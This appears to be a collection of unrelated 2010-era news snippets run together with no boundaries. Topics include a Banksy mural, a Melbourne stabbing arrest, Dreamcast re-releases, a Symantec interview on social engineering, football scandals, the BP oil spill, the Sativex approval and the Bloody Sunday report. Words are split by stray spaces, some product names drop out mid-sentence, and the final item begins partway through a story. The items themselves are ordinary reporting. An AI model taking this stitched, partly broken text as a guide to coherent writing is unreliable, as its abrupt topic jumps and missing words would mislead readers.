The third issue of Eye of the World arrived in stores earlier this week .
According to this post , the original plan was for Eye of the World to cover roughly 36 issues , to be collected in six volumes .
Just for book one .
Dynamite has been good at keeping the comics on schedule since they relaunched a few months ago , but at that pace , even if they never miss a month , it ’ll take 42 years to adapt the whole series !
Banksy believed to be behind ' Run For Your Lives !!!' mural in Primrose Hill pub
Graffiti artist Banksy has ' struck ' in yet another night - time raid , producing a mural on the wall of a Primrose Hill pub .
The managers of the Princess of Wales , Karen and Lawrence Santi , were initially upset to discover there had been an intruder overnight before discovering the uninvited guest was none other than the famous mystery artist , who produces most of his works undetected and closely guards his identity .
Banksy 's work has been sold for hundreds of thousands of pounds .
Hallmarks : Experts say the ' Run for your lives ' mural that appeared overnight in a London pub 's garden contains several clues that it was painted by Banksy Job well done : the pub 's CCTV shows the artist standing back to admire his creation
Miss Santi revealed her husband was about to begin painting over the outdoor mural of a lion and little girl , above which the message ' run for your lives !!!' is written in red paint , when they learned the identity of the artist .
She said the artist had most likely entered through a gate that was accidentally left open , or by using a stepladder captured in the CCTV footage .
While the footage of the incident shows Banksy clearly , his face is covered by a hooded top .
The footage , which begins at about 1 am , shows him setting up a light to illuminate his ' canvas ' and standing back to appraise his work
While there is no concrete proof the work belongs to Banksy , the signature on a balloon string in the mural appears to be his .
Hard at work :
The hoodie - wearing artist is silhouetted against the wall by the light he set up in the beer garden as he applies the finishing touches
Hallmarks : Experts say the ' Run for your lives ' mural that appeared overnight in a London pub 's garden contains several clues that it was painted by Banksy
Banksy 's name has been reported as Robin Gunningham and he is said to have been born in Bristol in 1974 , but that remains a rumour .
The relatives of Indian student Nitin Garg , who was stabbed to death in Melbourne earlier this year , have thanked Victorian police for their work in the murder investigation .
A 15 - year - old boy has appeared in a Victorian Children 's Court charged with the murder Mr Garg as he walked to work through a park at West Footscray in early January .
The teenager was arrested about 9.00 am AEST after a lengthy police investigation and has been remanded in custody .
His parents wept in the front row of the court during the short hearing .
Accountancy graduate Mr Garg , 21 , struggled on to the doorstep of his workplace after the stabbing , but died later in hospital .
His death came amid controversy about allegedly racist attacks on Indians in Victoria and outrage in the Indian media .
Police have refused to speculate on a motive for the attack , but do not believe it was racially motivated or gang related .
Today Mr Garg 's family in India expressed gratitude to Victoria Police for the work they have done pursuing the case .
Family spokesman Raj Kumar transported Mr Garg 's body from Delhi to Punjab and arranged his funeral .
" We are satisfied with the Australian police and the Australian Government for the initiative they have taken , " he said .
" We appreciate that .
We are satisfied with their efforts .
We are totally satisfied . "
In a sad twist , the family is again in mourning over the death of Mr Garg 's grandfather .
But that has not dampened their relief over today 's breakthrough .
" We are really thankful to the police of Australia , " Raj Kumar said .
" Very good job .
Really very good job .
We are satisfied from our heart . "
At a Victoria Police press conference this afternoon , Detective Inspector Bernie Edwards acknowledged the intense public interest in the murder in Australia and India .
Detective Inspector Edwards says police were under pressure and put a considerable amount of resources into the investigation .
" We are extremely pleased for Nitin Garg 's family and the community here in Australia and all the Indian students , " Detective Inspector Edwards said .
Message to the community
Mr Garg 's murder sparked outrage in India and came amid a number of attacks on Indian students and taxi drivers in Melbourne .
Police are clearly hoping today 's arrest will send a message to the Indian community and help instil some security .
" Victoria Police at all levels are engaging with the Indian community and other communities to assure them that Australia is a great place to live and it is usually a safe place to live , " Detective Inspector Edwards said .
He says the investigation is not over yet .
" We have interviewed a number of other people in relation to the matter and inquiries are pending , " he said .
" We intend to speak to other people in relation to it . "
Tim Singh Lawrence is acting mayor at Darebin Council in Melbourne 's north , home to a large population of Punjabi Indians , Indian students and Indian taxi drivers .
Mr Lawrence says the arrest will be reassuring to the Indian community .
" I was very relieved that the investigation that 's been going on so long has led to some fruitful developments , " he said .
" I think it will be very reassuring for the wider Indian community in Victoria and Australia to know that the police maintained their investigation until they got a result . "
He has also urged caution in relation to the reaction to the arrest .
" I think that at this point there 's been quite a bit of emotion generated around this case , " he said .
" Now that we 're proceeding to a legal process , I 'd urge everyone , regardless of the country of birth of the alleged offender ... to be calm . "
Sega said Thursday that it would bring classic , updated Dreamcast classics to PlayStation 3 and Xbox 360 , beginning with downloadable versions ofand , originally released in the West in 1999 on the Dreamcast , will be the first game to arrive on current generation consoles ' digital storefronts .
Sega did not reveal a release timeframe forBoth of the games will be based on the Dreamcast originals , but will be updated with high - definition graphics , surround sound , online leaderboards , and Achievement and Trophy support .
While Sega only announcedandthus far , a press statement indicated that the games will only be the " first two classics made available " on current consoles .
The Dreamcast launched on September 9 , 1999 in North America , and was supposed to be Sega 's big comeback from the flagging Sega Saturn .
But despite a strong lineup of titles and technology that facilitated advanced graphics and out - of - the - box online connectivity , the console could n't overcome competition from Sony and Nintendo .
In January 2001 , Sega said it would be pulling out of the hardware business .
" There are few things that are more requested from us than making Dreamcast classics available for download in today 's digital market place , " said Sega of America and Europe VP of digital business Haruki Satomi .
" We 're very excited to begin offering gamers our beloved Dreamcast titles again on the current console systems .
" Rumors that Dreamcast games would be available for download on current systems emerged last year , when a purportedly leaked internal meeting document between Sega and Sony Computer Entertainment America revealed plans for Dreamcast digital titles on PS3 .
And earlier this week , the ESRB listed ratings foron Xbox 360 , PS3 and PC .
Digital models will become an increasingly important part of Sega 's strategy going forward .
Amid Sega layoffs earlier this year , Sega West president Mike Hayes revealed that Sega 's San Francisco office would become home base for digital initiatives , while London would become focused on packaged goods .
Who 's got the safest operating system ?
Apple , Google , Microsoft ?
According to one security expert , what really matters is who 's using the OS .
" Microsoft does n't have a monopoly on all the technical vulnerabilities that are out there , " Zulfikar Ramzan , technical director of Symantec Security Response , said Tuesday in a phone interview with PCWorld .
Today 's online criminals are far more likely to target user behavior rather than a technical flaw in the OS .
" It 's a lot easier to do that , " said Zulfikar .
" You do n't need as many technical skills to find one person who might be willing , in a moment of weakness , to open up an attachment that contains malicious content . "
This trend has been rising rapidly over the past two years .
Currently , only about 3 percent of the malicious software that Symantec encounters exploits a technical vulnerability .
The other 97 percent of malware is either " piggybacking on that 3 percent , " or more likely trying to trick a user through some type of " social engineering " scheme , according to Zulfikar .
Tricking the User
In other words , most attackers now target human , not technical , vulnerabilities .
The key is to trick someone , usually via psychological manipulation , into compromising their own security by installing malware , for instance .
One such attack is when an organization 's chief financial officer ( CFO ) receives an email claiming to be from the IRS .
" It says you have n't paid your taxes , and if do n't open up this attachment and fill out this form , we 're going to fine you , " Zulfiker said .
A similar scheme involves a bogus inquiry from the " Better Business Bureau . "
The attacker (s ) , claiming to be the BBB , email a company 's CEO and say they 've opened a complaint file against the firm .
The email then instructs the CEO to open the attachment to find out more about the complaint .
Of course , in each case , the attachment propagates malicious software onto the recipient 's system .
So what 's a business to do ?
First , treat any inbound inquiry with a healthy degree of skepticism .
" That should apply through all forms of communication - - not just email , but even phone calls and things of that nature , " said Zulfiker .
And make sure that all of your employees are aware of these risks .
" It 's important to educate people , even on the front lines , to be careful what you divulge to the outside world about the company , " he added .
Microsoft : Still the Biggest Target
No computer or operating system is 100 - percent secure , of course , and different types of systems are vulnerable to different exploits .
" Microsoft , being the biggest company in the software space , has attracted the most attention , " Zulfiker said .
" People have tried to attack Microsoft 's products because of the ( huge ) market share .
If I 'm an attacker , and I want to make the most profit from my attacks , I 'm better off going for the company with the most machines out there .
That tends to be Microsoft . "
And if Google 's upcoming Chrome OS takes off in the business and consumer market , it 'll have a big target on its back too .
In her teens , Linda Green idolised her local football team .
But the years of domestic violence and sex scandals surrounding the game mean she can't cheer for England now
As a teenage girl , I was obsessed with football .
The love affair began in 1981 when , aged 11 , I decided that football was the new ponies – down came my posters of Black Beauty , up went everything Tottenham Hotspur .
From 1983 , I was a regular at White Hart Lane , cheering from the terraces , and , during the school holidays , the Spurs training ground .
Fans could stroll in , watch the players and have photos taken with their idols .
This was an era before the media obsession with Wags , when the players were married to teachers and nurses , not models and pop stars , and , to the best of my knowledge , none of them took advantage of any of the young female fans .
I 'm not saying the Spurs team in the 80s were all saints , but my own idol Gary Mabbutt was , and still is , a fantastic ambassador for the game , working alongside Nelson Mandela to help bring the 2010 World Cup to South Africa .
When I moved away from London in 1989 , hooliganism in football was thankfully fading , but sexism , racism and homophobia were still rampant .
Big money poured in from Sky TV at the end of the 80s , and then , in 1992 , came the creation of the Premier League when football became a really lucrative business and the players celebrities .
By the mid-90s , my relationship with the game was increasingly acrimonious and from the last Premier League match I attended , when Spurs were playing my local team , Coventry City , all I can remember was the barrage of homophobic abuse directed at Tottenham 's David Ginola by his own fans .
I knew it was time to hang up my scarf .
From then on , I watched in dismay as a breed of arrogant young men was created .
Players used and abused women – and knew they were untouchable .
Their clubs were too financially dependent on their skills to cut them loose .
When Euro 96 fever hit Britain , it suddenly became cool for women to be football fans .
But the ugly side of football was ever more evident .
I still remember the photos of the battered face of Paul Gascoigne 's wife Sheryl after he smashed her head on the floor at a hotel in Scotland in October 1996 .
Yet the football establishment failed to act .
Gazza was considered , as former England manager Bobby Robson once said , simply " daft as a brush " .
It was n't until a few years later , when Gascoigne was caught committing an apparently more serious crime – eating a late - night kebab – that he was finally dropped from the team .
In 1998 , it was Ulrika Jonsson 's battered face in the tabloids , courtesy of former England star Stan Collymore .
Another media outcry , but again the football establishment remained silent .
Over the next decade came a stream of allegations of binge drinking , addiction , nightclub brawls , rape , domestic violence , serial adultery and " roasting " sex scandals .
By the time I gave birth to my son Rohan in 2004 , I was n't looking forward to taking him to football matches .
Thankfully , he 's never asked .
Some say footballers just reflect our society , their crimes magnified because of their celebrity .
To an extent , this is true .
It 's not necessarily surprising that young men with huge disposable incomes , often from poor educational backgrounds , find it difficult to resist temptation , or lack a strong moral code .
But what is deplorable is that none of the big clubs or the Football Association has come out strongly against the worst of their behaviour .
Instead , we hear depressing accusations about footballers such as John Terry , who allegedly had an affair .
He was stripped of the captaincy , but will still be playing for the team at the World Cup .
Terry 's replacement as England captain was Rio Ferdinand – who was previously banned for missing a routine drugs test and has clocked up four driving bans .
Injury has now ruled Ferdinand out , so the captain 's armband has gone to Steven Gerrard , who – with only one drink - driving conviction and having been cleared of affray in a bar brawl two years ago – is the obvious " clean - cut " candidate .
Well , who else could it have gone to ?
Ashley Cole perhaps , if it had n't been for the allegations of adultery and debauchery .
Wayne Rooney ?
Maybe , as Colleen has forgiven him for soliciting a prostitute earlier in their relationship .
The truth is that I would no rather have my son parading around with the name of Terry , Ferdinand , Cole or Rooney emblazoned on his back than I would take him to the local magistrates court to cheer on those who have been found guilty of a similar array of misdemeanours .
And I would urge other parents to think about the sort of role models they want for their children before shelling out for that mini England kit .
I wo n't be cheering on " our lads " during the World Cup .
I can't .
They do n't represent me or my country .
Linda Green 's new novel , Things I Wish I 'd Known , is published by Headline Review ( £ 6.99 ) .
The Department of Defense has identified 4,394 American service members who have died since the start of the Iraq war and 1,085 who have died as a part of the Afghan war and related operations .
It confirmed the deaths of the following Americans this week :
Iraq
THEOBALD , Steve M. , 53 , Sgt. , Army ; Goose Creek , S.C. ; 287th Transportation Company .
Afghanistan
KLUSACEK , Erick J. , 22 , Sgt. , Army ; Calcium , N.Y. ; 101st Airborne Division .
SHANFIELD , Derek L. , 22 , Sgt. , Marines ; Hastings , Pa. ; Second Marine Division .
WALTERS , Zachary J. , 24 , Sgt. , Marines ; Palm Coast , Fla. ; Second Marine Division .
Back Slang
Butchering the Language
An unusual kind of slang , known as back slang , evolved in England .
One of the places it flourished was in butcher shops , where it allowed the butcher to order his assistant to bring out the old piece of meat for this customer .
A word was coded by writing it backwards and trying to make a sensible pronounciation , although certain sounds like " th " did n't actually get reversed , and extra vowels were inserted as necessary .
In some cases , syllables were added or dropped , vowel sounds modified , or a single letter , such as " h " , became pronounced .
Backslang showed up several times , complete with subtitles , in the Australian movie " The Hard Word " , starring Guy Pearce as one of a trio of bankrobbers .
He is the son of a butcher , and one of his mates is a butcher .
Several brief backslang interchanges occur during the movie , involving " yenom " and " dratsabs " .
In France , there is a similar slang , called Verlan , commonly used by immigrants .
In this language , the reversal often takes place at the level of syllables , rather than letters .
The greeting Bonjour , ca va ? " becomes Jourbon , ca av? , and a cafe becomes a feca .
You can't be a Jedi , because the Force is n't real .
You can't be a Na'vi , because your hair is n't magic .
But you can do a pretty good job of living like a Vulcan from Star Trek , and here 's how .
Advertisement
And let 's face it - Vulcans are way cooler than Jedi or Na'vi anyway .
( At least if you ignore Star Trek : Enterprise , which you really , really should . )
Vulcans are quite possibly the most fully realized alien race television or movies have ever created , and not just because they have a complex culture and history .
Vulcans have something most made - up races can only dream of : a central contradiction that 's ultra-compelling .
They 're overflowing cauldrons of passion , who have mastered their emotions to such a high degree they appear almost robotic .
No matter how pissed off or freaked out you might ever get , you can't be as hot - blooded as a Vulcan .
And you 'll have to work pretty hard to be half as cool .
Vulcans have a philosophy , a way of life , and a spiritual discipline .
And they get things done .
Best of all , you do n't really need alien physiology and fancy powers to embrace the Vulcan way of life .
Advertisement
In case you need more help after reading this , a great list of Spock 's sayings , from the TV episodes , movies and some books , is here .
There 's also a list of Vulcan proverbs here .
And Jacqueline Lichtenberg 's great essay on Surak 's philosophy is here ( PDF ) .
And a stimulating bulletin - board discussion of Vulcan logic and culture is here .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
So here are ten ways you can live like a Vulcan , starting today .
They 're vaguely ranked in order of difficulty , and the last couple of items are probably beyond your abilities .
Advertisement
Wish other people long life and prosperity .
Okay , so the Vulcans supposedly do n't have much in the way of emotions , right ?
So why should they care whether you live for a long time ?
Or whether you have a rich life ?
It should be all the same to them one way or the other .
But they do wish you a long and prosperous life , because it 's part of their philosophy .
What we humans imperfectly translate as " logic " is really something more complicated - pure logic would n't necessarily consider long life preferable to instant death .
Either one could be logical , depending on your goal .
But if " logic " is really a part of an attitude that includes a respect for life , then it makes total sense .
And similarly ...
Make your greeting into a blessing .
That famous four - fingerd " V " salute is n't simply a simple hello or goodbye , as it might appear .
According to this site , that double - V sign is based on an ancient Jewish gesture , practiced by the Kohanim when they bless a synagogue 's congregation during an Orthodox worship service .
Leonard Nimoy writes in his book I Am Spock that he witnessed this hand gesture during a worship service when he was a child — you 're not supposed to look at the Kohanim when they 're delivering the blessing , but he peeked .
When the episode " Amok Time " called for Spock to greet T'Pau , an early script called for Spock to kneel and have T'Pau put her hands on his shoulders .
But Nimoy felt this was too hands - on for Vulcans , so he came up with the gesture we know today .
Nimoy practiced it for hours before he had to do it for the first time .
According to Lichtenberg 's essay , linked above , the salute also represents a number of Vulcan ideals , including logic , reverence for life , and respect for the dignity of the individual .
Advertisement
Celebrate diversity .
A lot of us pay lip service to diversity , but for Vulcans , it 's one of the cornerstones of their philosophy , and Spock even sports a fancy medallion to underscore his commitment to it in one episode .
It really is only logical : the more you learn about the universe , the more you discover that its power comes from its diversity of cultures as well as phenomena .
So it just makes sense to appreciate " Infinite Diversity in Infinite Combinations . "
When you encounter someone from a different background or group , try to understand the logic of his / her ideas .
( Of course , Spock was a judgemental S.O.B. sometimes , but none of us ever lives up to our ideals . )
Advertisement
Become a vegetarian .
According to the AnimalRightist blog , Spock and most other Vulcans are vegetarian , and in fact so is actor Leonard Nimoy .
Spock frequently says that it 's illogical to kill without reason , and in one episode , he tells Dr. McCoy , " In a strict scientific sense , Doctor , we all feed on death - even Vegetarians . "
Anyway perhaps the comparatively low - protein diet helps Vulcans rein in their passions .
Advertisement
Put the needs of the many ahead of the few ( or the one ) .
This is getting a bit more difficult .
If Spock ever spouted a motto , it would be the one he mentions in Star Trek II : The Wrath Of Khan .
Putting this philosophy into practice is a lot harder than it looks , though - it 's sort of like the Hedonic Calculus , if John Stuart Mill did n't believe in the value of personal pleasure .
You sort of have to apply this idea on a case - by - case basis - like , if killing one person would save a million people from a nasty headache , do the needs of the many still outweigh the needs of the one ?
Probably not .
This is where logic comes in .
But still , if you want to be a Vulcan , you probably need to spend more time thinking about how your own personal needs conflict with the needs of the many - and whether there are instances where you might be able to put others ' needs first .
Practice stoicism .
As Mark Vernon writes in his " Philosophy of Star Trek " blog post :
Stoicism ... might now be called the Vulcan way of life .
It 's beautifully captured in the words of Spock 's father : " What is necessary is never unwise . "
The Stoics believed the cosmos and everything in it is determined .
To resist what is necessary is therefore not just futile , it is also to destroy your chances of a happy life .
The main locus of this struggle to ' go with the flow ' is in our judgments about things .
When we judge wrongly , perhaps overwhelmed by emotions , we resist necessity .
When we judge well , perhaps asserting our reason , we go with necessity and so flourish .
Advertisement
That does n't mean you should be passive , or avoid taking drastic action when circumstances require it .
But knowing when to accept necessity and when to struggle is a pillar of Vulcan wisdom .
( And I think this is where Kiri - kin - tha 's First Law Of Metaphysics , " Nothing unreal exists , " comes in .
Part of stoicism is accepting reality . )
Advertisement
Learn to meditate .
One of the things that I always loved about Star Trek : Voyager was the focus on Tuvok 's practice of meditation .
The show rarely used Tuvok well , but the glimpses we saw of Tuvok 's practices were really great .
And it seems like if you really want to tame your boiling core of emotion , you need a practice that allows you to see the world as the nest of illusion it is .
You must recognize that desire is both illusory and poisonous , and only then can you master your emotions .
As John Walsh writes in the Independent newspaper ,
It 's significant that the Vulcan word for emotion - purging is " arei'mnu , " which means " control of emotion " ; the ideal Vulcan mindset , then , is an iron discipline about feelings - a rather Buddhist freeing of the self from disturbing impulses .
Advertisement
Practice touch telepathy .
Sorry , I 'm not going to be able to teach you how to put your fingers on someone 's head and step inside his or her head .
Maybe in a few decades , we 'll have the gene - splicing or drugs to let us possess real touch telepathy , like the Vulcans have .
But for now , the closest you can come is being more aware of your body and how you touch others , and how you enter other people 's physical space .
You can also learn to read people 's body language , and understand the signals we 're all constantly sending out .
People communicate in many other ways besides language , and the more you can interpret this , the closer you 'll get to being able to mind meld .
Advertisement
Go to extremes for love .
We humans dont actually experience any kind of " mating season " like the Vulcans ' Pon Farr - adult humans are just ready to go 24/7/365 , pretty much .
( No wonder the Vulcans find us a bit alarming . )
You 'd probably only get in trouble if you tried to use hormones or diet to give yourself a mating season , and anyway our particular biological configuration does have its advantages .
But you can recognize , as the Vulcans do , that there really are times when it 's pointless to fight your passion .
The Vulcans have domesticated their passions in every other sphere , but when it comes to mating , all they can do is shroud their passions in ritual .
These rituals probably should n't include whacking your friends or rivals in the head with giant double - headed axes or anything .
But as important as it is to govern your passions , embrace necessity and put the needs of the many before the needs of the one in other areas , Vulcans teach us that in love , it 's vital to go overboard and be dramatic .
And our rituals and performances only add to the drama and give it context , rather than dampening it .
And quite right too .
Advertisement
Send your children into the wilderness .
As Walsh points out in his Independent article , the Vulcans have a pretty bizarre approach to child - rearing .
In particular , Vulcan children must go alone into the savage terrain of Vulcan in the " Kahs - wan " ritual .
As Walsh explains : " Each child must go wandering in the wilderness or desert , fending for himself , as logic and ingenuity dictate .
Sometimes , unimaginative children die on these gruelling excursions , but life goes on without them . "
You might get in a spot of trouble with the authorities if you were to take the Vulcan example too literally .
But you can recognize that your children are people , and that they need to be challenged as well as protected , and that sometimes befriending a giant beast is the best way to make sure they turn into awesome adults .
Advertisement
Living like a Vulcan is something we humans will never be able to accomplish fully - but it 's something to aspire to .
And maybe aspiring to Vulcan - hood can make us better humans .
Vulcan fan art by Ro-Tine , Karracaz , Susan Lovatt , Jochimus , Mike Penick and Daisy via the Spock and Saavik Fan Art page .
Steve - O is n't just happy because he's not going to jail -- after a judge dismissed a felony drug charge today for good behavior -- Steve - O's happy because now he gets to be sober just for himself .
And it feels good .
Play video content
The " Jackass " star stopped by the dreaded California DMV after appearing in court today with attorney Barry Gerald Sands -- where he proved to a judge he 's been 100 % sober for 18 months since his arrest in 2008 .
The judge was so impressed he dismissed the felony drug charge for cocaine possession ... and even took Steve - O's arrest off his record .
But some things never change -- Steve - O tells TMZ he was at the DMV because he lost his wallet after getting naked and donning a wrestling singlet for an upcoming Jackass 3D flick .
1988 : Piper Alpha oil rig ablaze
A fire on a North Sea oil rig is feared to have claimed the lives of most of those on board .
The fire is believed to have started after explosions at about 2230 BST ( 2130 GMT ) on the Piper Alpha drilling platform , 120 miles ( 193 km ) off the north - east coast of Scotland .
Helicopters and boats were immediately sent out to rescue the oil workers in an operation co-ordinated by the Aberdeen coastguard .
Pilots reported seeing an " inferno " up to 350 ft ( 107 m ) high and a platform wrenched apart .
It is thought approximately 225 men were working on the rig owned by Occidental Oil .
Safety inspection
Survivors are being airlifted to the Aberdeen Royal Infirmary - some are said to be seriously injured .
Most of those who have been rescued so far said they survived by sliding down pipes or jumping hundreds of feet into the sea which was covered in burning oil .
The Piper Alpha platform is the largest and oldest platform in the North Sea oilfield .
It was last inspected two weeks ago but last week there was a small fire on the rig .
Since drilling began in the North Sea in the 1970s there have been 300 deaths on Britain 's 123 oil installations , often in accidents caused by bad weather .
Via Robert Reich , something that , if true , confirms most of what I already thought -- namely , that BP 's priority is still their bottom line :
A petroleum engineer who 's worked in the oil industry tells me BP is doing the minimum to clean up the oil and everything it can to protect its bottom line .
According to the engineer , here ’s what BP should be doing right now to mitigate the damage .
If the president were to put BP into temporary receivership , he ’d have the power to get BP to :
1. Stop releasing dispersants .
So - called dispersants are toxic , and it's crazy to add more poison to the Gulf .
Dispersants do nothing to assist the environment in naturally cleaning the oil ; their main use is PR .
They reduce the number of ugly pictures of birds covered in pure black crude .
Dispersants break the thick layer of crude into smaller globs , but that does n’t help the Gulf and its wildlife .
Most of the crude just mixes with the water to produce a goop that looks like chocolate ice cream but is highly poisonous .
2. Mobilize every possible tanker to siphon up crude from as close to the leak points as possible .
Oil industry leaders as John Hofmeister ( president of Shell Oil from 2005 until 2008 ) have recommended this , but inexplicably neither BP nor the federal government are talking about even trying this idea .
BP currently has only one spot where they have inserted a tube into a riser , or pipe , that is leaking oil from the sea floor .
The company is gathering the crude oil and siphoning it up to a drill ship for storage .
They should have at least a dozen collectors .
BP has 24 tankers that are being used to make money for BP , not for clean - up duty .
( President Obama should also use all necessary federal power -- or money , and send BP the bill -- to put as many tankers and refineries from other companies on the task . )
Mile - long pipes could be dangled down into the crude spewing from the wellhead and at each breach in the riser pipe , and the tankers could pump the crude mixed with water back into the tankers .
They could then separate the crude and water in the tanker , and pump the water out on the spot .
This should continue until each tanker is full of oil .
The crude should then be taken to a refinery for processing , as other tankers take their place .
Submersibles can be used to monitor the uptake into the dangling pipes , moving them as needed to keep them picking up as much crude as possible .
Even after some separation time in the tankers , the crude will be contaminated with water beyond the typical water contamination levels acceptable at refineries .
This would drive up the price of gas in the short term .
The president will need to go on TV and ask all Americans to cut their gasoline and energy usage in half , as an emergency response to the disaster in the Gulf , so that tankers and refineries can enact these far - from - perfect clean - up measures .
3. Restart work on the second pressure relief well .
BP did start work on two relief wells as the government requested , but the second has been shut down to cannabalize parts from it for the primary well kill effort .
The president must order BP to spend whatever money it takes to get another blow out preventer on site , to re-start work on the second pressure relief well .
A recent blow - out off the coast of Australia required five pressure relief wells to successfully shut it down .
This Sunday , June 6th , heavy metal fans from around the world will unite to celebrate the fourth International Day Of SLAYER ( IDoS ) , and demand the official recognition of June 6th as a public holiday .
Those who observe the holiday are encouraged to stage " Slay - outs " : " Listen to Slayer at full blast in your car , in your home , at your place of employment , and in any public place you prefer . "
Headphones are considered an offense to the movement .
When this crusade first launched four years ago on 06/06/06 , it was in response to the American " National Day Of Prayer , " which is held on the first Thursday of May .
Gaining momentum every year , the IDoS Board last year petitioned the White House for official recognition of the holiday , citing that " heavy metal music is the central belief of a culture that exists among us , and Slayer is the perfect spokesperson . "
During a recent interview with AOL's NoiseCreep , Slayer 's Kerry King said about the IDoS , " I think it 's awesome , and it 's totally cool that fans have taken the time to maintain it .
Slayer should have a national holiday - there are enough stupid holidays out there , so why not have one for us ? "
To lend support to the International Day of Slayer , log onto NationalDayOfSlayer.org / .
In support of its latest album , World Painted Blood , Slayer - guitarists King and Jeff Hanneman , bassist / vocalist Tom Araya , and drummer Dave Lombardo - is currently on a massive European tour that includes several Sonisphere Festival dates where they will perform as part of the " heavy metal dream " Big Four - METALLICA , Slayer , MEGADETH , and ANTHRAX .
Slayer will return to North America in late July to co-headline ( with Megadeth ) the east coast Canadian Carnage tour , and then , starting August 11th , the American Carnage tour .
Slayer 's entire summer tour schedule can be accessed at this location .
While we 're limited to merely 3DTV depictions of the 2010 World Cup , Japan is letting its freak flag fly in a proposal to host the 2022 matches with a concept envisioning matches captured by 200 HD cameras , then projected as fully 3D images onto real fields in other countries .
Just in case technology has n't advanced that far in the next decade plus , there 's also the possibility of positioning mics underneath the playing surface to catch every sound , with all of this powered by solar panels plus the kinetic energy created by a stadium full of fans .
Even committee director of technology Jun Murai admits the proposal " smacks of science fiction " but seriously , this is Japan we 're talking about -- if the beautiful game is still being played by non-augmented human beings and not a squad of robots we 'll be surprised .
Either way , someone should put Wolf Blitzer and Will .
I. Am on standby just in case .
Nine Speakers , the agency that represents Helen Thomas , has dropped her as a client .
This comes in the wake of controversial remarks on the Middle East .
The notice , obtained by POLITICO :
It is with a heavy heart that Nine Speakers , Inc. announces its resignation as the agent for Helen Thomas , Dean of the White House Press Corps .
Ms. Thomas has had an esteemed career as a journalist , and she has been a trailblazer for women , helping others in her profession , and beyond .
However , in light of recent events , Nine Speakers is no longer able to represent Ms. Thomas , nor can we condone her comments on the Middle East .
Nine Speakers will continue to enthusiastically represent all of our other current and future clients .
comments closed
permalink
The latest gadget from Sony 's in - house geeks will surely get your cat tweeting .
A prototype tweeting cat collar , which Sony created in collaboration with the University of Tokyo , last month 's Open House 2010 .
The lifelogging device , can send tweets to Twitter detailing what your cat is up to , packs in an accelerometer , GPS , and a built - in camera .
If the acceleration sensor detects movement , for example , the gadget will assume that your cat is on the move .
The collar can also detect when your cat is eating or sleeping .
The collar has been designed so that it 's light enough and small enough that it does n't cause the cat any discomfort .
Once the collar has detected that cat 's activities , it will send a tweet about it via Bluetooth .
Sony says that the prototype collar can send one of eleven pre-set phrases , however the plan is to add more detailed informative tweets over time .
The day - to - day " lifelogging " application of a device like this does n't seem to have a great deal of merit , much like Mattel 's Puppy Tweets toy ( or Wired 's Beer robot ) , although the GPS capabilities could be useful if your furry feline friend goes missing .
One BoingBoing commenter jested that " There 's no indication users would want a Sony tablet , but everyone knows Sylvester wants Tweetie . "
Would you like to get your paws on a device like this ?
Let us know in the comments !
[ Via Tech On ]
Like this ?
You may also enjoy ...
Follow Chris Brandrick and GeekTech on Twitter .
LONDON — A drug manufactured from cannabis went on sale in the U.K.
Monday as a treatment for symptoms of multiple sclerosis .
Sativex , which is made from cannabis plants grown at secret locations in England by developer GW Pharmaceuticals PLC , is the first prescription drug made from cannabis to officially go on sale anywhere in the world .
It offers legal access to the beneficial effects of an illegal drug that thousands of multiple - sclerosis sufferers have smoked in an attempt to relieve their pain .
It is also a boon for small U.K. drug developers , which have struggled in recent years to win investor confidence — and funding — because of setbacks in clinical trials of their experimental medicines .
Sativex was approved Friday by the U.K. Medicines and Healthcare products Regulatory Agency , or MHRA , as a treatment for spasticity in multiple - sclerosis patients who are n't benefiting from other treatments .
It had been in development for 11 years .
Sativex 's approval follows successful clinical trials .
The drug will be marketed in the U.K. by Germany 's Bayer AG , which said Monday it will cost the country 's state - run National Health Service roughly £ 11 , or about $ 16 , a day for each patient .
An intoxicated driver launched her Chevy Impala , Dukes Of Hazzard - style , over a toll booth as she left the Dallas - Forth Worth International Airport yesterday .
The car clipped the toll booth but both the operator and driver escaped without serious injury .
UPDATE : We 've found out who the woman is who launched her car over the Dallas - Fort Worth airport toll booth .
Click here for her story .
Advertisement
The accident at the toll booth on Memorial Day is the second amazing accident to occur in the Dallas area in less than a week after the Pepsi truck crash on May 28th .
Here 's a photo of the aftermath :
VIDEO : Car Hits Pepsi Truck , Causes Catastrophic Wreck
In this Jalopnik exclusive video — the driver of a Pepsi semi - truck is cut off by an out - of - control Read more
Advertisement
So , although North Texas drivers can't drive , at least they make their mistakes on camera .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
[ The Dallas Observer ]
Click to view
The report into the Bloody Sunday killings in 1972 has been published by the British Government .
The most expensive and longest - running inquiry in British history has found that the events in Derry on 30 January 1972 were ' unjustified and unjustifiable ' and that all those killed were innocent victims .
In Derry , the families of those who were killed gathered and welcomed British Prime Minister David Cameron 's House of Commons speech about the findings .
The inquiry , headed by Lord Saville , found that the casualties were not armed and posed no threat .
It said the first shot was fired by the British Army .
The inquiry said the casualties were down to the soldiers ' losing their self control ' .
Mr Cameron told the House of Commons that on behalf of his government and his country he was ' deeply sorry ' .
Read the main story on the report from Lord Saville .
Read the full 5,000 - page report into the events of Bloody Sunday .
Watch British Prime Minister David Cameron 's address to the House of Commons following the publication of the Saville Inquiry in the Bloody Sunday killings .
Watch Taoiseach Brian Cowen 's address where he says it has been a day where the truth has been set free in the city of Derry .
Read about how the families of the Bloody Sunday victims reacted when report into the deaths was published .
Watch Bishop Edward Daly and Tony Doherty , whose father Paddy was one of those killed , give their reaction
Watch Martin McGuinness discuss the findings of the Saville Report
Watch Brendan
Wright 's report that relatives were not expecting the response that they got from the British government
Read about the timeline of events from 30 January 1972 in Derry .
A woman who answered the phone at Ms. Love ’s family home in Maryland said , “ No comment . ” Mr. Huguely ’s family did not return a call seeking comment .
The top - ranked Virginia ’s men ’s lacrosse team is expected to be the top seed heading into this month ’s N.C.A.A. tournament .
The women ’s team is in the top five and considered to be a strong contender to advance to the national semifinals .
Image Yeardley Love. Credit ... University of Virginia
University of Virginia lacrosse has endured its share of recent tragedy : the former men ’s captain Will Barrow died of an apparent suicide in 2008 and the longtime assistant media relations director Michael Colley , who was the main contact for the men ’s lacrosse team , died of a heart attack in July .
Now the program is in shock again .
“ Charlottesville is just a wonderful place , ” Mr. Longo said .
“ Kids from all over the country come here , the best and brightest , and these are two of them , two successful athletes .
“ It ’s just an unbelievable situation .
These are not the kinds of things we see in this community . ”
